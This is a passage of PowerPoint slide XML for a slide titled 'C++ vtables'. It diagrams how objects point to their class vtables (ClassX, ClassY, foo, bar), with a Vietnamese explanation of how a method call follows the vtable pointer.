              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Google Shape;441;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1710287-66C7-369B-FE60-7BEBB5E43B6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="3962012"/>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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ClassX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> vtable</a:t>
            </a:r>
            <a:endParaRPr b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;442;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0993758C-B612-60B7-B1A4-5293D4488131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="2392550"/>
            <a:ext cx="2103000" cy="492412"/>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sz="2000" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ClassY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> vtable</a:t>
            </a:r>
            <a:endParaRPr sz="2000" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Google Shape;443;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{314E6836-5E56-9697-6568-4E805461B91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5574525" y="1711212"/>
            <a:ext cx="971700" cy="273000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Google Shape;444;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F82644-7979-D842-D891-A5399D94D104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5574525" y="3302497"/>
            <a:ext cx="971700" cy="273000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2161638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D104-C0CB-BCC5-2FDD-7ECEDD7AC4B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>C++ vtables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D288D92-5818-876A-680E-B7DA743C21A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Google Shape;431;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E9624D-B403-DB72-07CA-677F18FB20A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3494529739"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="385375" y="1582187"/>
          <a:ext cx="2103150" cy="24380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vtable of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>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0002"/>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vtable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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;432;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B19454A5-C5C3-3AED-49BD-B053E5DA5238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385450" y="3966851"/>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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Google Shape;433;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C3A534-7B76-220A-7CB0-6986FDDB50D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3669590185"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="3062962"/>
          <a:ext cx="2103150" cy="9142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bar</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foo</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Google Shape;434;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C4D9887-9F01-7F76-2731-DF732D2FA2C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2476500" y="3839307"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Google Shape;435;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CC824F7-9690-6FBD-CBE8-7D421A09B1E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3425248127"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3471475" y="1540875"/>
          <a:ext cx="2103150" cy="9142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bar</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foo</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Google Shape;436;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D557DE8A-D525-C7C7-9722-99EFCE65ECF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488450" y="2276562"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Google Shape;437;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78FBE5B0-4C5D-B648-AC50-425E419E44BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2118769285"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6546125" y="1295400"/>
          <a:ext cx="2103150" cy="304760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bar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassY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BD0FF"/>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foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassY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bar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassX</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7"/>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foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassX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8"/>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9"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Google Shape;438;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A9877B7-0256-A95A-8306-98CDD864098C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="2262187"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Google Shape;439;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7E85170-D165-A41E-F902-2CF1BF86A038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="3814047"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Google Shape;440;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78616D26-C879-0F93-7820-F99C7B9E2388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546275" y="4297376"/>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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Google Shape;441;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53CE435B-8B56-B3B3-5179-9CF6BBA2F908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="3962012"/>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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ClassX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> vtable</a:t>
            </a:r>
            <a:endParaRPr b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;442;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BA317B7-2AFB-CD9B-631B-939E22EF2777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="2392550"/>
            <a:ext cx="2103000" cy="492412"/>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sz="2000" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ClassY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> vtable</a:t>
            </a:r>
            <a:endParaRPr sz="2000" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Google Shape;443;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42F4575A-8BE9-74B1-F10A-543A9580BB4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5574525" y="1711212"/>
            <a:ext cx="971700" cy="273000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Google Shape;444;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{853AAB75-E223-1AA2-F66F-7237B305232F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5574525" y="3302497"/>
            <a:ext cx="971700" cy="273000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;430;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D3E2306-3C02-C0E6-FE3D-9A5EC0E32CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4800600"/>
            <a:ext cx="7615625" cy="1415742"/>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GB" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Để thực thi một phương thức của </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicParenBoth"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="200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Theo con trỏ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="200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sym typeface="Arial"/>
              </a:rPr>
              <a:t> vtable của y tới bảng vtable của </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ClassY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicParenBoth"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="200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Theo con trỏ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2000" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
